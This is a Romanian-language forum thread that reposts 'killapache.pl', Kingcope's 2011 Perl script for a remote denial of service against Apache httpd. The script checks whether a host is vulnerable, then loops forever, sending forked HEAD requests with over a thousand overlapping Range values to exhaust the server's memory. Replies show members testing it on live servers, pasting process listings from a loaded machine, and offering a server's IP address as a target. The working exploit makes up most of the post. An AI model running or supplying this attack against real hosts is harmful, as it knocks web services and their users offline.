Apache httpd Remote Denial of Service (memory exhaustion)

[Nytro]

Apache httpd Remote Denial of Service (memory exhaustion)

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;  

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;  
} else {
    return 0;  
}
}

if ($#ARGV < 0) {
    usage;
    exit;  
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;  
}
while(1) {
killapache();
}

Pare promitator...

Sursa: Apache httpd Remote Denial of Service (memory exhaustion)

[Zatarra]

Testat cu Nytro pe un Berkeley. This script does the shit ;-)

CPU states: 14.1% user, 70.1% system, 15.7% nice, 492.5% idle

CPU states: 98.4% user, 1.5% system, 0.0% nice, 0.0% idle

CPU states: 98.7% user, 1.2% system, 0.0% nice, 0.0% idle

Procese:

12736 apache 20 0 311M 111M 1156 S 0 7.9 0.9 0:06 httpd

12739 apache 20 0 311M 111M 1156 S 0 7.5 0.9 0:06 httpd

12809 apache 20 0 311M 111M 1156 S 0 7.1 0.9 0:00 httpd

12768 apache 20 0 311M 111M 1156 S 0 6.7 0.9 0:03 httpd

12791 apache 20 0 311M 111M 1156 S 0 6.7 0.9 0:01 httpd

12792 apache 20 0 311M 111M 1156 S 0 6.7 0.9 0:01 httpd

12808 apache 20 0 311M 111M 1156 S 0 6.7 0.9 0:00 httpd

12779 apache 20 0 311M 111M 1156 S 0 6.3 0.9 0:02 httpd

12794 apache 20 0 311M 111M 1156 S 0 6.3 0.9 0:01 httpd

12753 apache 20 0 311M 111M 1156 S 0 5.9 0.9 0:04 httpd

etc..

Edited August 21, 2011 by Zatarra

[Xander]

eu am testat pe 3 servere si nu a mers...

[Zatarra]

Zi-mi un server ca testez eu, sa ai acces pt top macar, sau sa vezi procesele.

[Xander]

89.44.239.202 e al meu

p.s.: dai pe 82 ca pe 80 e nginx

[Zatarra]

Host does not seem vulnerable

Ideea ar fi sa nu fie https si nici Nginx, ma gandesc ca deaia ii zice Apache killer

Alte hosturi normale nu ai? asa spre exemplu daca dau si eu pe cel de acasa e blocat automat deoarece nu trece de filtre

[Xander]

am zis ca pe portu 82 e apache normal... are https pornit dar ala e pe 443

[l34k]

Eu am rulat scriptul pe loopback avand un apache care asculta pe localhost si pot sa confirm ca nu merge. Nu stiu de ce anume.